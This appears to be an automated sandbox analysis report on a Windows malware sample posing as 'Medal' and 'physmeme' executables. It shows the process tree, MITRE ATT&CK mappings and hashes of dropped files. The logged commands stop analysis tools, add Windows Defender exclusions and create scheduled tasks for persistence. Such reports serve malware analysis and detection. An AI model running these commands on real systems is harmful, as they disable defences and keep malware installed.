- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:4676
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:4036
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:1472
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:2848
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:5092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:1188
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2936
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:696
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Medal\Lqadn5PlaOgkwctRw0u0CpsLmFuP4Dy5KMER3d1aVdEsbDMhh.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:2928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Medal\sfJ30b2ZZFyDMeam9b2hAYa.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:3188
    - - C:\Medal\Medal.exe
        
        "C:\Medal/Medal.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1880
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sysmon.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\unsecapp.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:872
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Idle.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4136
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Medal\fontdrvhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3556
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\taskhostw.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1708
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Medal\Medal.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2768
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HRxPRAyd3e.bat"
        6⤵
        
        PID:1212
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:3808
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4788
        
        C:\Medal\Medal.exe
        
        "C:\Medal\Medal.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4892 -ip 4892
1⤵
PID:1972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:8

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Medal\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Medal\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Medal\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 14 /tr "'C:\Medal\Medal.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 11 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Medal\Lqadn5PlaOgkwctRw0u0CpsLmFuP4Dy5KMER3d1aVdEsbDMhh.vbe

Filesize
206B

MD5
4f3f273179a1bd058ed059d322db85fc

SHA1
7eb81ffc4a93e30c4a2733d59acf7870df2103f6

SHA256
5b59e046d311d49f2f4ac613e394b0e3b4a925a6918ed8a9a9420929d2eed70d

SHA512
49a6fe66b7d9df496f57d5d2e66752141e5227072df13b3d3655be982e6a499607e276bf9f27bb16164309166f8116c0cd0481dcd5d8a05fb0ff1cde9c06299d

Download Submit
C:\Medal\Medal.exe

Filesize
1.6MB

MD5
397270342ebff19bad2535390cff49c6

SHA1
482edca85dc4a788acfaf1d1155f95c0e4f5e1f1

SHA256
143e3baeafa9d95f8261d342a8d74fceb1006c92fdabb8642d730ede7429bdaa

SHA512
6492376f333de41d0d7e8a21d32f8d0a10d2f9827948a9fe4fe04ee5bd6b10d3a2bd984c74201c3bfc8bf41347aaf0dc4b2b86dbeff4bfa8e65f7a03e7c9a9ba

Download Submit
C:\Medal\sfJ30b2ZZFyDMeam9b2hAYa.bat

Filesize
76B

MD5
913226ebe160f705613c1d6dc13763ca

SHA1
11519fe4f2769114270377bebe1d944073c68ae9

SHA256
9c8501b6c9e586b9791b7492697c2555a28fec65770e325890047d410fc84941

SHA512
8f45b29bde3794e02a263f07116260a588c478496c892ce4d12b7b8361ae6dac95a1ee0f0d7c7fb81ebdfb7c4d5123ccf18ef5ae9e150be04f65aa22a2d75e00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Medal.exe.log

Filesize
1KB

MD5
4ef3ab577fdbd5c7dd815e496ecd5601

SHA1
8dd86865a8e5f1c4c77a21cc2b26cc31e8330ad8

SHA256
72a639b0e0027ca8e0bb9d3cbd12b56797c431a9171acaea9217aff387961964

SHA512
ffe35302cf9922fb22d681c989162a46220b949b5dcaf076eadb1ced347ff0b7a77421ce6ee06514faf9c5364e2094f5a2ec239a537c28c88d32e21262501c9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9c172d22fbbdafe12dfc5c909edea107

SHA1
9961cfc5a51f1d375186fc64bf98214bdc0cf2df

SHA256
315439a1131019ecb316a0344395624965a961baff563be19221620e6e3dc18d

SHA512
d459ca5a3abd05b5bff39056065e786eec0260cb83b03c774ab0b98f07dfc8ef7dd5db5f37c569ac0d531ebd640c6dc0aaefc407d357280e07b011e982b91e2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Temp\HRxPRAyd3e.bat

Filesize
146B

MD5
e217f8eb7e0186500b444cb8aee940f5

SHA1
2b0c27577ae4b2e9a79630b487cb4d35bcb64213

SHA256
52301d54bcd41aab76fd7584ea86e8c0cf008c1592c906d33e25f2a9bd007220

SHA512
d30a2cc6bd7a0914fab4577f20f31e39b75a18f76228c5d261c4c0b38897e2f6a08fa44edd31f183861effdb9a2f59c09cc3b3d722d15ea5d8d1cc516ac8ff0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1eazqq5h.u0b.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\gdi32.dll

Filesize
446KB

MD5
efd69d9f6037086f0b2e23417b7a1afa

SHA1
ac3c91b7bdcafad357ee578aa6fdbece22cd19ab

SHA256
27ef5c51d945dd64cd17718b01ce72fb352f9fc0a83f1adfd601d1e62b1469b0

SHA512
3bd6d0e1419286ce77c30a30f9e7df7114b5f6b81b75cd703e0293bb391ab7e573a807c267b461e7448a0e3744777b614bfa32b241cb4bc63fe44bf2173bf40f

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
694KB

MD5
1dc5d763d93e66ff1775cfc9d749d82d

SHA1
76f7efc39d4ae890c9d2da577af942f959f0d03f

SHA256
1de1f60c6f5ea26d2f2ebf5447910f156db59d896bbe753c90aa828cd6ef06f1

SHA512
4108d78571bd6df8a4e66ae70e2546a0b2011a3224f29acde1739e5b4ea80fde7450d00759fd479e8cbef75e7d26a840635509bd709a2863c6346dfab3f8e050

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
1.9MB

MD5
45d510cebcdf9aa852297a7303627ab1

SHA1
86605b896ec57d214d5839b2db897ae79be32778

SHA256
fc66c2a511a43c990ca2485814be308f2c65ef61d82124299036b3f8f694e5ee

SHA512
42ea67e8a6aaff3d1daec65f0b9c5e53952f55894fc0ce31259e61ad4ac277d3225d3b9ae142f78ae2d466387a0d92c5ba8059a0b2404d5a200aece40b9cea85

Download Submit
memory/1708-61-0x000001BCC3370000-0x000001BCC3392000-memory.dmp

Filesize
136KB

Download
memory/1880-36-0x0000000001150000-0x000000000115C000-memory.dmp

Filesize
48KB

Download
memory/1880-34-0x0000000001140000-0x000000000114E000-memory.dmp

Filesize
56KB

Download
memory/1880-32-0x0000000000790000-0x000000000093A000-memory.dmp

Filesize
1.7MB

Download
memory/1880-72-0x000000001BF30000-0x000000001BFFD000-memory.dmp

Filesize
820KB

Download
memory/2760-127-0x000000001C460000-0x000000001C52D000-memory.dmp

Filesize
820KB

Download
memory/4892-4-0x0000000002870000-0x0000000002876000-memory.dmp

Filesize
24KB

Download
memory/4892-3-0x0000000000470000-0x0000000000526000-memory.dmp

Filesize
728KB

Download
memory/5000-11-0x0000000000730000-0x000000000078A000-memory.dmp

Filesize
360KB

Download
memory/5000-12-0x0000000000730000-0x000000000078A000-memory.dmp

Filesize
360KB

Download
memory/5000-16-0x0000000000730000-0x000000000078A000-memory.dmp

Filesize
360KB

Download